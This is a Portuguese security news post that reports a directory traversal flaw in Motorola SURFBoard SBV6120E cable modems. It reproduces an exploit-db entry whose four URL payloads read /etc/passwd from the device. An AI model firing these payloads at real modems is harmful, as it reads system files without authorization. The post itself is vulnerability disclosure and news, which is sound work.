» Últimos artigos

samhain - verificador de integridade de filesystem Honeypot: Aprendendo com o intruso Moscrack, vencendo a WPA com ajuda de um Cluster Usando o http-wp-plugins do Nmap para detectar plugins do Wordpress Protegendo seu WebServer contra o Slowloris HTTP DoS As soluções baseadas em Software Livre são mais seguras que as Proprietárias ?

» Últimas notícias

pfSense 2 Cookbook Até 50% de desconto para as últimas vagas do treinamento Investigação Forense Digital da 4Linux. curso de Pentest Hands On aqui em SP Promoção LINUX + A VirtualLink Consultoria abre vagas para sua Divisão de TI Celulares de segunda mão contêm grande quantidade de dados pessoais

» Últimas dicas

Pacote Oficial Linux LPI Ghost Phisher - suite para ataques de phishing usando Fake DNS, DHCP e BLA, BLA, BLA...! ! ! T50 Experimental Packet Injector Tool Word List Dicas de medidas preventivas contra técnicas avançadas de evasão Instalação do Scanner de Vulnerabilidades OpenVAS3 em um Server - CentOS 5.5 i386/64bits Mais uma ferramenta para análise forense. Conheça o Weaknet Linux! Fortalecendo o kernel Linux com (Debian) Grsecurity (HARDENING)

[Como anunciar?]

» Login

» Top 10 usuários

256627: Luiz Vieira 180053: André 131811: Rubens Queiroz de Almeida 127877: Mauro Risonho de Paula Assumpção A.K.A firebits 106291: Paulo Moraes 87374: Alexandro Silva 50223: Thalysson Sarmento 49563: Denny Roger 47779: Carlos Eduardo Testa, a.k.a ceth 45973: Jorge G Meinhardt

» .Conf

[OpenSSH] sshd_conf - Como criar uma conexão SSH com mais segurança. [Fail2ban] jail.conf - Fail2ban

[Notícia] Skavurska! Motorola SURFBoard Cable Modem Directory Traversal

roberto_espreto

Notícia enviada por Roberto Soares (3spreto)

Encontrada recentemente uma vulnerabilidade que pode ser explorada nos modems Motorola SURFBoard através de "directory traversal", exibindo assim informações valiosas. Realizados os testes no modelo SBV6120E, Firmware Name: SBV6X2X-1.0.0.5-SCM-02-SHPC.

Data: 16/06/2010

[ Hits: 12260 ]

Versão para impressora

Indicar para um amigo

Enviar notícia

Skavurska! Motorola SURFBoard Cable Modem Directory Traversal

Abaixo o código-fonte do exploit.

# Exploit Title: Motorola SURFBoard Cable Modem Directory Traversal
# Date: 2010.06.03
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: Model name: SBV6120E, Firmware Name: SBV6X2X-1.0.0.5-SCM-02-SHPC
# Tested on: ^
# CVE: -
# Code :
The following urls get back the /etc/passwd file from the modem:

http://[IP]///etc/passwd <http://[ip]///etc/passwd>
http://[IP]/../../etc/passwd

http://[IP]/..%2f..%2fetc/passwd <http://[ip]/..%2f..%2fetc/passwd>
http://[IP]/%2e%2e/%2e%2e/etc/passwd

Fonte: http://www.exploit-db.com/exploits/12865/

Outras notícias deste autor

Nenhuma notícia encontrada.

Leitura recomendada